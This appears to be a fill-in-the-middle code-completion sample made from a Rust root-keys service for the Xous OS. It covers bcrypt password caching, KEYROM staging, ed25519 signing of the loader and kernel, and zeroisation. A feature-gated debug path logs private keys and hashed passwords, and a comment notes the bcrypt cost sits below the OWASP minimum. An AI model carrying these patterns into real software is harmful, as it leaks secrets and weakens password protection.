// make a copy of the KEYROM to hold the new mods, in the sensitive data area
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for addr in 0..256 {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, addr);
sensitive_slice[addr as usize] = self.keyrom.rf(utra::keyrom::DATA_DATA);
}
// provision the pepper
for keyword in sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter_mut() {
*keyword = self.trng.get_u32().expect("couldn't get random number");
}
}
/// Core of the key initialization routine. Requires a `progress_modal` dialog box that has been set
/// up with the appropriate notification messages by the UX layer, and a `Slider` type action which
/// is used to report the progress of the initialization routine. We assume the `Slider` box is set
/// up to report progress on a range of 0-100%.
///
/// This routine dispatches the following activities:
/// - generate signing private key (encrypted with update password)
/// - generate rootkey (encrypted with boot password)
/// - generate signing public key
/// - set the init bit
/// - sign the loader
/// - sign the kernel
/// - compute the patch set for the FPGA bitstream
/// - do the patch (whatever that means - gotta deal with the AES key, HMAC etc.)
/// - verify the FPGA image hmac
/// - sign the FPGA image
/// - get ready for a reboot
/// - returns true if we should reboot (everything succeeded)
/// - returns false if we had an error condition (don't reboot)
pub fn do_key_init(&mut self, progress_modal: &mut Modal, progress_action: &mut Slider) -> bool {
// kick the progress bar to indicate we've entered the routine
update_progress(1, progress_modal, progress_action);
let keypair: Keypair = Keypair::generate(&mut self.trng);
// pub key is easy, no need to encrypt
let public_key: [u8; ed25519_dalek::PUBLIC_KEY_LENGTH] = keypair.public.to_bytes();
{ // scope sensitive_slice narrowly, as it borrows *self mutably, and can mess up later calls that borrow an immutable self
// sensitive_slice is our staging area for the new keyrom contents
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in public_key.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PUBKEY as usize..KeyRomLocs::SELFSIGN_PUBKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
// extract the update password key from the cache, and apply it to the private key
let pcache: &PasswordCache = unsafe{&*(self.pass_cache.as_mut_ptr() as *mut PasswordCache)};
#[cfg(feature = "hazardous-debug")]
{
log::info!("cached boot passwords {:x?}", pcache.hashed_boot_pw);
log::info!("cached update password: {:x?}", pcache.hashed_update_pw);
}
// private key must XOR with password before storing
let mut private_key_enc: [u8; ed25519_dalek::SECRET_KEY_LENGTH] = [0; ed25519_dalek::SECRET_KEY_LENGTH];
// we do it this way to make as few copies of the hashed password as possible
for (dst, (plain, key)) in
private_key_enc.iter_mut()
.zip(keypair.secret.to_bytes().iter()
.zip(pcache.hashed_update_pw.iter())) {
*dst = plain ^ key;
}
// store the private key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in private_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PRIVKEY as usize..KeyRomLocs::SELFSIGN_PRIVKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(10, progress_modal, progress_action);
// generate and store a root key (aka boot key), this is what is unlocked by the "boot password"
// ironically, it's a "lower security" key because it just acts as a gatekeeper to further
// keys that would have a stronger password applied to them, based upon the importance of the secret
// think of this more as a user PIN login confirmation, than as a significant cryptographic event
let mut boot_key_enc: [u8; 32] = [0; 32];
for (dst, key) in
boot_key_enc.chunks_mut(4).into_iter()
.zip(pcache.hashed_boot_pw.chunks(4).into_iter()) {
let key_word = self.trng.get_u32().unwrap().to_be_bytes();
// just unroll this loop, it's fast and easy enough
(*dst)[0] = key[0] ^ key_word[0];
(*dst)[1] = key[1] ^ key_word[1];
(*dst)[2] = key[2] ^ key_word[2];
(*dst)[3] = key[3] ^ key_word[3];
// also note that interestingly, we don't have to XOR it with the hashed boot password --
// this key isn't used by this routine, just initialized, so really, it only matters to
// XOR it with the password when you use it the first time to encrypt something.
}
// store the boot key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in boot_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::USER_KEY as usize..KeyRomLocs::USER_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(20, progress_modal, progress_action);
// sign the loader
let (loader_sig, loader_len) = self.sign_loader(&keypair);
update_progress(30, progress_modal, progress_action);
// sign the kernel
let (kernel_sig, kernel_len) = self.sign_kernel(&keypair);
update_progress(40, progress_modal, progress_action);
// encrypt the FPGA key using the update password. in an un-init system, it is provided to us in plaintext format
// e.g. in the case that we're doing a BBRAM boot (eFuse flow would give us a 0's key and we'd later on set it)
#[cfg(feature = "hazardous-debug")]
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key before encryption: ");
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (word, key_word) in sensitive_slice[KeyRomLocs::FPGA_KEY as usize..KeyRomLocs::FPGA_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()
.zip(pcache.hashed_update_pw.chunks(4).into_iter()) {
*word = *word ^ u32::from_be_bytes(key_word.try_into().unwrap());
}
}
update_progress(50, progress_modal, progress_action);
// set the "init" bit in the staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
sensitive_slice[KeyRomLocs::CONFIG as usize] |= keyrom_config::INITIALIZED.ms(1);
}
update_progress(60, progress_modal, progress_action);
#[cfg(feature = "hazardous-debug")]
{
log::info!("Self private key: {:x?}", keypair.secret.to_bytes());
log::info!("Self public key: {:x?}", keypair.public.to_bytes());
self.debug_staging();
}
// Because we're initializing keys for the *first* time, make a backup copy of the bitstream to
// the staging area. Note that if we're doing an update, the update target would already be
// in the staging area, so this step should be skipped.
self.make_gateware_backup(60, 70, progress_modal, progress_action);
// compute the keyrom patch set for the bitstream
// at this point the KEYROM as replicated in sensitive_slice should have all its assets in place
patch::should_patch(42);
// finalize the progress bar on exit -- always leave at 100%
update_progress(100, progress_modal, progress_action);
true
}
fn make_gateware_backup(&mut self, prog_start: u32, prog_end: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
// println!("this is a test of stdlib");
}
#[cfg(feature = "hazardous-debug")]
fn | (&self) {
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PRIVKEY as usize, 256, "Self private key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PUBKEY as usize, 256, "Self public key: ");
self.debug_print_key(KeyRomLocs::DEVELOPER_PUBKEY as usize, 256, "Dev public key: ");
self.debug_print_key(KeyRomLocs::THIRDPARTY_PUBKEY as usize, 256, "3rd party public key: ");
self.debug_print_key(KeyRomLocs::USER_KEY as usize, 256, "Boot key: ");
self.debug_print_key(KeyRomLocs::PEPPER as usize, 128, "Pepper: ");
self.debug_print_key(KeyRomLocs::CONFIG as usize, 32, "Config (as BE): ");
}
#[cfg(feature = "hazardous-debug")]
fn debug_print_key(&self, offset: usize, num_bits: usize, name: &str) {
use core::fmt::Write;
let mut debugstr = xous_ipc::String::<4096>::new();
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
write!(debugstr, "{}", name).unwrap();
for word in sensitive_slice[offset .. offset as usize + num_bits/(size_of::<u32>()*8)].iter() {
for byte in word.to_be_bytes().iter() {
write!(debugstr, "{:02x}", byte).unwrap();
}
}
log::info!("{}", debugstr);
}
pub fn sign_loader(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let loader_len =
xous::LOADER_CODE_LEN
- SIGBLOCK_SIZE
+ graphics_server::fontmap::FONT_TOTAL_LEN as u32
+ 8; // two u32 words are appended to the end, which repeat the "version" and "length" fields encoded in the signature block
// this is a huge hash, so, get a hardware hasher, even if it means waiting for it
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let loader_region = self.loader_code.as_slice::<u8>();
// the loader data starts one page in; the first page is reserved for the signature itself
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
// now get the font plane data
self.gfx.bulk_read_restart(); // reset the bulk read pointers on the gfx side
let bulkread = BulkRead::default();
let mut buf = xous_ipc::Buffer::into_buf(bulkread).expect("couldn't transform bulkread into aligned buffer");
// this form of loop was chosen to avoid the multiple re-initializations and copies that would be entailed
// in our usual idiom for passing buffers around. Instead, we create a single buffer, and re-use it for
// every iteration of the loop.
loop {
buf.lend_mut(self.gfx.conn(), self.gfx.bulk_read_fontmap_op()).expect("couldn't do bulkread from gfx");
let br = buf.as_flat::<BulkRead, _>().unwrap();
hasher.update(&br.buf[..br.len as usize]);
if br.len != bulkread.buf.len() as u32 {
log::trace!("non-full block len: {}", br.len);
}
if br.len < bulkread.buf.len() as u32 {
// read until we get a buffer that's not fully filled
break;
}
}
if false { // this path is for debugging the loader hash. It spoils the loader signature in the process.
let digest = hasher.finalize();
log::info!("len: {}", loader_len);
log::info!("{:x?}", digest);
// fake hasher for now
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
} else {
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
}
}
pub fn sign_kernel(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let kernel_region = self.kernel.as_slice::<u8>();
// for the kernel length, we can't know/trust the given length in the signature field, so we sign the entire
// length of the region. This will increase the time it takes to verify; however, at the current trend, we'll probably
// use most of the available space for the kernel, so by the time we're done maybe only 10-20% of the space is empty.
let kernel_len = kernel_region.len() - SIGBLOCK_SIZE as usize;
hasher.update(&kernel_region[SIGBLOCK_SIZE as usize ..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the kernel"), kernel_len as u32)
}
/// Called by the UX layer at the epilogue of the initialization run. Allows suspend/resume to resume,
/// and zero-izes any sensitive data that was created in the process.
pub fn finish_key_init(&mut self) {
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
// zeroize the RAM-backed data
for data in sensitive_slice.iter_mut() {
*data = 0;
}
// re-allow suspend/resume ops
self.susres.set_suspendable(true).expect("couldn't re-allow suspend/resume");
}
}
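// Sketch of the prehashed ed25519 flow used by sign_loader() and sign_kernel()
// above: stream the image through a SHA-512, sign the digest, and verify the same
// way. `sha2::Sha512` and the fixed secret bytes are stand-ins assumed for
// illustration only; the firmware hashes with the hardware engine and derives its
// keypair from the TRNG.
#[cfg(test)]
mod prehash_signing_example {
    use ed25519_dalek::{Keypair, PublicKey, SecretKey};
    use sha2::{Digest, Sha512};

    #[test]
    fn sign_and_verify_prehashed() {
        let secret = SecretKey::from_bytes(&[7u8; 32]).expect("any 32 bytes form a valid secret");
        let public = PublicKey::from(&secret);
        let keypair = Keypair { secret, public };

        let image = [0xA5u8; 4096]; // stand-in for a loader or kernel region
        let mut hasher = Sha512::new();
        hasher.update(&image[..]);

        let sig = keypair
            .sign_prehashed(hasher.clone(), None)
            .expect("couldn't sign the prehash");
        keypair
            .public
            .verify_prehashed(hasher, None, &sig)
            .expect("signature should verify");
    }
}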
fn update_progress(new_state: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
log::info!("progress: {}", new_state);
progress_action.set_state(new_state);
progress_modal.modify(
Some(gam::modal::ActionType::Slider(*progress_action)),
None, false, None, false, None);
progress_modal.redraw(); // stage the modal box pixels to the back buffer
progress_modal.gam.redraw().expect("couldn't cause back buffer to be sent to the screen");
xous::yield_slice(); // this gives time for the GAM to do the sending
}
| debug_staging | identifier_name |
implementation.rs | use gam::FONT_TOTAL_LEN;
use ticktimer_server::Ticktimer;
use utralib::generated::*;
use crate::api::*;
use core::num::NonZeroUsize;
use num_traits::*;
use gam::modal::{Modal, Slider};
use crate::bcrypt::*;
use crate::api::PasswordType;
use core::convert::TryInto;
use ed25519_dalek::{Keypair, Signature, Signer};
use engine_sha512::*;
use digest::Digest;
use graphics_server::BulkRead;
use core::mem::size_of;
use root_keys::key2bits::*;
// TODO: add hardware acceleration for BCRYPT so we can hit the OWASP target without excessive UX delay
const BCRYPT_COST: u32 = 7; // 10 is the minimum recommended by OWASP; takes 5696 ms to verify @ 10 rounds; 804 ms to verify 7 rounds
/// Size of the total area allocated for signatures. It is equal to the size of one FLASH sector, which is the smallest
/// increment that can be erased.
const SIGBLOCK_SIZE: u32 = 0x1000;
#[repr(C)]
struct SignatureInFlash {
pub version: u32,
pub signed_len: u32,
pub signature: [u8; 64],
}
struct KeyRomLocs {}
#[allow(dead_code)]
impl KeyRomLocs {
const FPGA_KEY: u8 = 0x00;
const SELFSIGN_PRIVKEY: u8 = 0x08;
const SELFSIGN_PUBKEY: u8 = 0x10;
const DEVELOPER_PUBKEY: u8 = 0x18;
const THIRDPARTY_PUBKEY: u8 = 0x20;
const USER_KEY: u8 = 0x28;
const PEPPER: u8 = 0xf8;
const FPGA_MIN_REV: u8 = 0xfc;
const LOADER_MIN_REV: u8 = 0xfd;
const CONFIG: u8 = 0xff;
}
pub struct KeyField {
mask: u32,
offset: u32,
}
impl KeyField {
pub const fn new(width: u32, offset: u32) -> Self {
let mask = (1 << width) - 1;
KeyField {
mask,
offset,
}
}
pub fn ms(&self, value: u32) -> u32 {
let ms_le = (value & self.mask) << self.offset;
ms_le.to_be()
}
}
#[allow(dead_code)]
pub(crate) mod keyrom_config {
use crate::KeyField;
pub const VERSION_MINOR: KeyField = KeyField::new(8, 0 );
pub const VERSION_MAJOR: KeyField = KeyField::new(8, 8 );
pub const DEVBOOT_DISABLE: KeyField = KeyField::new(1, 16);
pub const ANTIROLLBACK_ENA: KeyField = KeyField::new(1, 17);
pub const ANTIROLLFORW_ENA: KeyField = KeyField::new(1, 18);
pub const FORWARD_REV_LIMIT: KeyField = KeyField::new(4, 19);
pub const FORWARD_MINOR_LIMIT: KeyField = KeyField::new(4, 23);
pub const INITIALIZED: KeyField = KeyField::new(1, 27);
}
/// This structure is mapped into the password cache page and can be zero-ized at any time
/// we avoid using fancy Rust structures because everything has to "make sense" after a forced zero-ization
/// The "password" here is generated as follows:
/// `user plaintext (up to first 72 bytes) -> bcrypt (24 bytes) -> sha512trunc256 -> [u8; 32]`
/// The final sha512trunc256 expansion is because we will use this to XOR against secret keys stored in
/// the KEYROM that may be up to 256 bits in length. For shorter keys, the hashed password is simply truncated.
#[repr(C)]
struct PasswordCache {
hashed_boot_pw: [u8; 32],
hashed_boot_pw_valid: u32, // non-zero for valid
hashed_update_pw: [u8; 32],
hashed_update_pw_valid: u32,
}
pub(crate) struct RootKeys {
keyrom: utralib::CSR<u32>,
gateware: xous::MemoryRange,
staging: xous::MemoryRange,
loader_code: xous::MemoryRange,
kernel: xous::MemoryRange,
/// regions of RAM that hold all plaintext passwords, keys, and temp data, stuck in two well-defined pages so we can
/// zero-ize it upon demand, without guessing about stack frames and/or Rust optimizers removing writes
sensitive_data: xous::MemoryRange, // this gets purged at least on every suspend, but ideally purged sooner than that
pass_cache: xous::MemoryRange, // this can be purged based on a policy, as set below
boot_password_policy: PasswordRetentionPolicy,
update_password_policy: PasswordRetentionPolicy,
cur_password_type: Option<PasswordType>, // for tracking which password we're dealing with at the UX layer
susres: susres::Susres, // for disabling suspend/resume
trng: trng::Trng,
gam: gam::Gam, // for raising UX elements directly
gfx: graphics_server::Gfx, // for reading out font planes for signing verification
spinor: spinor::Spinor,
}
impl RootKeys {
pub fn new(xns: &xous_names::XousNames) -> RootKeys {
let keyrom = xous::syscall::map_memory(
xous::MemoryAddress::new(utra::keyrom::HW_KEYROM_BASE),
None,
4096,
xous::MemoryFlags::R | xous::MemoryFlags::W,
)
.expect("couldn't map keyrom CSR range");
// read-only memory maps. even if we don't refer to them, we map them into our process
// so that no other processes can claim them
let gateware = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_MAIN_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_MAIN_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC gateware region");
let staging = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::SOC_STAGING_GW_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::SOC_STAGING_GW_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the SoC staging region");
let loader_code = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::LOADER_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::LOADER_CODE_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the loader code region");
let kernel = xous::syscall::map_memory(
Some(NonZeroUsize::new((xous::KERNEL_LOC + xous::FLASH_PHYS_BASE) as usize).unwrap()),
None,
xous::KERNEL_LEN as usize,
xous::MemoryFlags::R,
).expect("couldn't map in the kernel region");
let sensitive_data = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let pass_cache = xous::syscall::map_memory(
None,
None,
0x1000,
xous::MemoryFlags::R | xous::MemoryFlags::W,
).expect("couldn't map sensitive data page");
let spinor = spinor::Spinor::new(&xns).expect("couldn't connect to spinor server");
spinor.register_soc_token().expect("couldn't register rootkeys as the one authorized writer to the gateware update area!");
let keys = RootKeys {
keyrom: CSR::new(keyrom.as_mut_ptr() as *mut u32),
gateware,
staging,
loader_code,
kernel,
sensitive_data,
pass_cache,
update_password_policy: PasswordRetentionPolicy::AlwaysPurge,
boot_password_policy: PasswordRetentionPolicy::AlwaysKeep,
cur_password_type: None,
susres: susres::Susres::new_without_hook(&xns).expect("couldn't connect to susres without hook"),
trng: trng::Trng::new(&xns).expect("couldn't connect to TRNG server"),
gam: gam::Gam::new(&xns).expect("couldn't connect to GAM"),
gfx: graphics_server::Gfx::new(&xns).expect("couldn't connect to gfx"),
spinor
};
keys
}
fn purge_password(&mut self, pw_type: PasswordType) {
unsafe {
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
match pw_type {
PasswordType::Boot => {
for p in (*pcache_ptr).hashed_boot_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_boot_pw_valid = 0;
}
PasswordType::Update => {
for p in (*pcache_ptr).hashed_update_pw.iter_mut() {
*p = 0;
}
(*pcache_ptr).hashed_update_pw_valid = 0;
}
}
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
fn purge_sensitive_data(&mut self) {
let data = self.sensitive_data.as_slice_mut::<u32>();
for d in data.iter_mut() {
*d = 0;
}
core::sync::atomic::compiler_fence(core::sync::atomic::Ordering::SeqCst);
}
pub fn suspend(&mut self) {
match self.boot_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Boot);
}
}
match self.update_password_policy {
PasswordRetentionPolicy::AlwaysKeep => {
()
},
_ => {
self.purge_password(PasswordType::Update);
}
}
self.purge_sensitive_data();
}
pub fn resume(&mut self) {
}
pub fn update_policy(&mut self, policy: Option<PasswordRetentionPolicy>) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected policy update from the UX");
return;
};
if let Some(p) = policy {
match pw_type {
PasswordType::Boot => self.boot_password_policy = p,
PasswordType::Update => self.update_password_policy = p,
};
} else {
match pw_type {
PasswordType::Boot => self.boot_password_policy = PasswordRetentionPolicy::AlwaysPurge,
PasswordType::Update => self.update_password_policy = PasswordRetentionPolicy::AlwaysPurge,
};
}
// once the policy has been set, revert the current type to None
self.cur_password_type = None;
}
/// Plaintext password is passed as a &str. Any copies internally are destroyed. Caller is responsible for destroying the &str original.
/// Performs a bcrypt hash of the password, with the currently set salt; does not store the plaintext after exit.
pub fn hash_and_save_password(&mut self, pw: &str) {
let pw_type = if let Some(cur_type) = self.cur_password_type {
cur_type
} else {
log::error!("got an unexpected password from the UX");
return;
};
let mut hashed_password: [u8; 24] = [0; 24];
let mut salt = self.get_salt();
// we change the salt ever-so-slightly for every password. This doesn't make any one password more secure;
// but it disallows guessing all the passwords with a single off-the-shelf hashcat run.
salt[0] ^= pw_type as u8;
let timer = ticktimer_server::Ticktimer::new().expect("couldn't connect to ticktimer");
// the bcrypt function takes the plaintext password and makes one copy to prime the blowfish bcrypt
// cipher. It is responsible for erasing this state.
let start_time = timer.elapsed_ms();
bcrypt(BCRYPT_COST, &salt, pw, &mut hashed_password); // note: this internally makes a copy of the password, and destroys it
let elapsed = timer.elapsed_ms() - start_time;
log::info!("bcrypt cost: {} time: {}ms", BCRYPT_COST, elapsed); // benchmark to figure out how to set cost parameter
// expand the 24-byte (192-bit) bcrypt result into 256 bits, so we can use it directly as XOR key material
// against 256-bit AES and curve25519 keys
// for such a small hash, software is the most performant choice
let mut hasher = engine_sha512::Sha512Trunc256::new(Some(engine_sha512::FallbackStrategy::SoftwareOnly));
hasher.update(hashed_password);
let digest = hasher.finalize();
let pcache_ptr: *mut PasswordCache = self.pass_cache.as_mut_ptr() as *mut PasswordCache;
unsafe {
match pw_type {
PasswordType::Boot => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_boot_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_boot_pw_valid = 1;
}
PasswordType::Update => {
for (&src, dst) in digest.iter().zip((*pcache_ptr).hashed_update_pw.iter_mut()) {
*dst = src;
}
(*pcache_ptr).hashed_update_pw_valid = 1;
}
}
}
}
/// Reads a 256-bit key at a given index offset
fn read_key_256(&mut self, index: u8) -> [u8; 32] {
let mut key: [u8; 32] = [0; 32];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Reads a 128-bit key at a given index offset
fn read_key_128(&mut self, index: u8) -> [u8; 16] {
let mut key: [u8; 16] = [0; 16];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
}
/// Returns the `salt` needed for the `bcrypt` routine.
/// This routine handles the special-case of being uninitialized: in that case, we need to get
/// salt from a staging area, and not our KEYROM. However, `setup_key_init` must be called
/// first to ensure that the staging area has a valid salt.
fn get_salt(&mut self) -> [u8; 16] {
if !self.is_initialized() {
// we're not initialized, use the salt that should already be in the staging area
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
let mut key: [u8; 16] = [0; 16];
for (word, &keyword) in key.chunks_mut(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter()) {
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
} else {
self.read_key_128(KeyRomLocs::PEPPER)
}
}
/// Called by the UX layer to track which password we're currently requesting
pub fn set_ux_password_type(&mut self, cur_type: Option<PasswordType>) {
self.cur_password_type = cur_type;
}
/// Called by the UX layer to check which password request is in progress
pub fn get_ux_password_type(&self) -> Option<PasswordType> {self.cur_password_type}
pub fn is_initialized(&mut self) -> bool {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
if config & keyrom_config::INITIALIZED.ms(1) != 0 {
true
} else {
false
}
}
/// Called by the UX layer to set up a key init run. It disables suspend/resume for the duration
/// of the run, and also sets up some missing fields of KEYROM necessary to encrypt passwords.
pub fn setup_key_init(&mut self) {
// block suspend/resume ops during security-sensitive operations
self.susres.set_suspendable(false).expect("couldn't block suspend/resume");
// in this block, keyrom data is copied into RAM.
// make a copy of the KEYROM to hold the new mods, in the sensitive data area
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for addr in 0..256 {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, addr);
sensitive_slice[addr as usize] = self.keyrom.rf(utra::keyrom::DATA_DATA);
}
// provision the pepper
for keyword in sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter_mut() {
*keyword = self.trng.get_u32().expect("couldn't get random number");
}
}
/// Core of the key initialization routine. Requires a `progress_modal` dialog box that has been set
/// up with the appropriate notification messages by the UX layer, and a `Slider` type action which
/// is used to report the progress of the initialization routine. We assume the `Slider` box is set
/// up to report progress on a range of 0-100%.
///
/// This routine dispatches the following activities:
/// - generate signing private key (encrypted with update password)
/// - generate rootkey (encrypted with boot password)
/// - generate signing public key
/// - set the init bit
/// - sign the loader
/// - sign the kernel
/// - compute the patch set for the FPGA bitstream
/// - do the patch (whatever that means - gotta deal with the AES key, HMAC etc.)
/// - verify the FPGA image hmac
/// - sign the FPGA image
/// - get ready for a reboot
/// - returns true if we should reboot (everything succeeded)
/// - returns false if we had an error condition (don't reboot)
pub fn do_key_init(&mut self, progress_modal: &mut Modal, progress_action: &mut Slider) -> bool {
// kick the progress bar to indicate we've entered the routine
update_progress(1, progress_modal, progress_action);
let keypair: Keypair = Keypair::generate(&mut self.trng);
// pub key is easy, no need to encrypt
let public_key: [u8; ed25519_dalek::PUBLIC_KEY_LENGTH] = keypair.public.to_bytes();
{ // scope sensitive_slice narrowly, as it borrows *self mutably, and can mess up later calls that borrow an immutable self
// sensitive_slice is our staging area for the new keyrom contents
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in public_key.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PUBKEY as usize..KeyRomLocs::SELFSIGN_PUBKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
// extract the update password key from the cache, and apply it to the private key
let pcache: &PasswordCache = unsafe{&*(self.pass_cache.as_mut_ptr() as *mut PasswordCache)};
#[cfg(feature = "hazardous-debug")]
{
log::info!("cached boot passwords {:x?}", pcache.hashed_boot_pw);
log::info!("cached update password: {:x?}", pcache.hashed_update_pw);
}
// private key must XOR with password before storing
let mut private_key_enc: [u8; ed25519_dalek::SECRET_KEY_LENGTH] = [0; ed25519_dalek::SECRET_KEY_LENGTH];
// we do it this way to make as few copies of the hashed password as possible
for (dst, (plain, key)) in
private_key_enc.iter_mut()
.zip(keypair.secret.to_bytes().iter()
.zip(pcache.hashed_update_pw.iter())) {
*dst = plain ^ key;
}
// store the private key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in private_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PRIVKEY as usize..KeyRomLocs::SELFSIGN_PRIVKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(10, progress_modal, progress_action);
// generate and store a root key (aka boot key), this is what is unlocked by the "boot password"
// ironically, it's a "lower security" key because it just acts as a gatekeeper to further
// keys that would have a stronger password applied to them, based upon the importance of the secret
// think of this more as a user PIN login confirmation, than as a significant cryptographic event
let mut boot_key_enc: [u8; 32] = [0; 32];
for (dst, key) in
boot_key_enc.chunks_mut(4).into_iter()
.zip(pcache.hashed_boot_pw.chunks(4).into_iter()) {
let key_word = self.trng.get_u32().unwrap().to_be_bytes();
// just unroll this loop, it's fast and easy enough
(*dst)[0] = key[0] ^ key_word[0];
(*dst)[1] = key[1] ^ key_word[1];
(*dst)[2] = key[2] ^ key_word[2];
(*dst)[3] = key[3] ^ key_word[3];
// also note that interestingly, we don't have to XOR it with the hashed boot password --
// this key isn't used by this routine, just initialized, so really, it only matters to
// XOR it with the password when you use it the first time to encrypt something.
}
// store the boot key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in boot_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::USER_KEY as usize..KeyRomLocs::USER_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(20, progress_modal, progress_action);
// sign the loader
let (loader_sig, loader_len) = self.sign_loader(&keypair);
update_progress(30, progress_modal, progress_action);
// sign the kernel
let (kernel_sig, kernel_len) = self.sign_kernel(&keypair);
update_progress(40, progress_modal, progress_action);
// encrypt the FPGA key using the update password. in an un-init system, it is provided to us in plaintext format
// e.g. in the case that we're doing a BBRAM boot (eFuse flow would give us a 0's key and we'd later on set it)
#[cfg(feature = "hazardous-debug")]
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key before encryption: ");
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (word, key_word) in sensitive_slice[KeyRomLocs::FPGA_KEY as usize..KeyRomLocs::FPGA_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()
.zip(pcache.hashed_update_pw.chunks(4).into_iter()) {
